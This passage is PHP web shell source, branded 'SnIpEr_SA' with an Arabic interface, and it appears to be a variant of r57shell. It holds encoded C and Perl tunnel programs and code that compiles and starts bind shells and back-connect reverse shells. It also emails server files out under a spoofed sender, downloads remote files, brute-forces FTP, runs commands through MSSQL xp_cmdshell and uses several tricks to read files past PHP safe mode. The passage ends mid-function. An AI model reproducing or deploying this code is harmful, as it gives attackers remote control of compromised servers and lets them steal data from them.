+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +if($unix) + { + if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } + if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } + if($safe_mode) { $sysctl = '-'; } + else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } + else + { + $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); + if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } + if(empty($sysctl)) { $sysctl = '-'; } + setcookie('sysctl',$sysctl); + } + } +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}} +echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>'; +echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +if($unix) + { + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; + echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; + } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2)."الوضع الامن: <b>"; +echo (($safe_mode)?("<font color=#008000>فعال</font>"):("<font color=red>غير فعال</font>")); +echo "</b>".ws(2); +echo "اصدار البي اتش بي: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "الكيرل: <b>".(($curl_on)?("<font color=#008000>فعال</font>"):("<font color=red>غير فعال</font>")); +echo "</b>".ws(2); +echo "ماي سكل: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=#008000>فعال</font>"; } else { echo "<font color=red>غير فعال</font>"; } +echo "</b>".ws(2); +echo "ام اس سكل: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>غير فعال</font>";} +echo "</b>".ws(2); +echo "بوست قري سكل: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>غير فعال</font>";} +echo "</b>".ws(2); +echo "اوراكل: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=#008000>فعال</font>";}else{echo "<font color=red>مغلق</font>";} +echo "</b><br>".ws(2); +echo "الدوال الممنوعة : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>لايوجد</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "<br>".ws(2)."المساحة الخاليه : <b>".view_size($free)."</b> المساحة الكلية: <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9> +<tr><td align=right width=100>'; +echo $font; +if($unix){ +echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=tahoma size=-2 color=#2279D9><b>"; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +if(!empty($id)) { echo ws(3).$id."<br>"; } +else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>'; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=tahoma size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@getenv("USERNAME")."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table"); + @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )"); + @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); + $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table"); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table"); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table SnIpEr_SA_temp_table",$db); + @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from SnIpEr_SA_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table SnIpEr_SA_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + 